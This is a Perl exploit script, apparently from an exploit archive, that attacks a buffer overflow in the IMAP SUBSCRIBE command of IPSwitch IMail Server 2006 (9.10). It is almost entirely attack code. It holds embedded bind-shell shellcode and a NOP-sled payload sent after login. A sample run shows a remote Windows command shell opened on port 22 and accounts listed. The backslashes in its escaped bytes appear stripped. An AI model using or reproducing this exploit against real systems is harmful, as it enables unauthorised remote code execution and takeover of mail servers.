IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit

#!/use/bin/perl # Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 # Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org #F:>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass #* OK IMAP4 Server (IMail 9.10) #0 OK LOGIN completed #* FLAGS (Answered Flagged Deleted Seen Draft) #* 0 EXISTS #* 0 RECENT #* OK [UIDVALIDITY 1185270594] UIDs valid #* OK [UIDNEXT 485270595] Predicted next UID #2 OK [READ-WRITE] SELECT completed #3 OK SUBSCRIBE completed #Trying.. #Bingle!Maybe get it! #You can try to telnet 22 port, do you have nc? #D:Microsoft Visual Studio 8VC>nc -vv 192.168.1.2 22 #192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA #(UNKNOWN) [192.168.1.2] 22 (?) open #Microsoft Windows [.. 5.2.3790] #(C) .... 1985-2003 Microsoft Corp. #C:WINDOWSsystem32>net user #net user #\ ..... #------------------------------------------------------------------------------- #Administrator ASPNET Guest #IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0 #.................. #C:WINDOWSsystem32> use strict; use warnings; use IO::Socket; if( @ARGV != 3 ) { my $banner = qq{ Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 You must have a account to login the imap server, good luck! Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ imail_subscribe.pl <host> <username> <password> }; print $banner." "; exit( -1 ); } my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; # win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com my $shellcode = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x41". "xd1xfdxbcx83xebxfcxe2xf4xbdxbbx16xf1xa9x28x02x43". "xbexb1x76xd0x65xf5x76xf9x7dx5ax81xb9x39xd0x12x37". "x0exc9x76xe3x61xd0x16xf5xcaxe5x76xbdxafxe0x3dx25". "xedx55x3dxc8x46x10x37xb1x40x13x16x48x7ax85xd9x94". "x34x34x76xe3x65xd0x16xdaxcaxddxb6x37x1excdxfcx57". "x42xfdx76x35x2dxf5xe1xddx82xe0x26xd8xcax92xcdx37". "x01xddx76xccx5dx7cx76xfcx49x8fx95x32x0fxdfx11xec". "xbex07x9bxefx27xb9xcex8ex29xa6x8ex8ex1ex85x02x6c". "x29x1ax10x40x7ax81x02x6ax1ex58x18xdaxc0x3cxf5xbe". "x14xbbxffx43x91xb9x24xb5xb4x7cxaax43x97x82xaexef". "x12x82xbexefx02x82x02x6cx27xb9xfdxaax27x82x74x5d". "xd4xb9x59xa6x31x16xaax43x97xbbxedxedx14x2ex2dxd4". "xe5x7cxd3x55x16x2ex2bxefx14x2ex2dxd4xa4x98x7bxf5". "x16x2ex2bxecx15x85xa8x43x91x42x95x5bx38x17x84xeb". "xbex07xa8x43x91xb7x97xd8x27xb9x9exd1xc8x34x97xec". "x18xf8x31x35xa6xbbxb9x35xa3xe0x3dx4fxebx2fxbfx91". "xbfx93xd1x2fxccxabxc5x17xeax7ax95xcexbfx62xebx43". "x34x95x02x6ax1ax86xafxedx10x80x97xbdx10x80xa8xed". "xbex01x95x11x98xd4x33xefxbex07x97x43xbexe6x02x6c". "xcax86x01x3fx85xb5x02x6ax13x2ex2dxd4xaex1fx1dxdc". "x12x2ex2bx43x91xd1xfdxbc"; my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error. "; my $res = <$sock>; print $res; if( $res !~ /OK/ ) { exit( -1 ); } my $opcode = "x60x1Ax9Cx76"; #my $opcode = "x61x62x63x64"; my $num = 264991; my $nop = "#IMAILPUB" . "x90" x ( $num - length($shellcode) ).$shellcode."x90x90xebx06".$opcode."x90x90x90x90"."xE9x44xfdxffxff"."x90" x 400; # login print $sock "0 LOGIN $user $pass "; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; if( $res !~ /OK/ ) { exit(-1); } print $sock "2 SELECT INBOX "; while( <$sock> ) { print $_; if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) { last; } } print $sock "3 SUBSCRIBE "$nop" "; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; print "Trying.. "; sleep( 15 ); print "Bingle! Maybe get it! You can try to telnet 22 port, do you have nc? "; print $sock "4 LOGOUT "; print <$sock>; $sock->close(); # sebug.net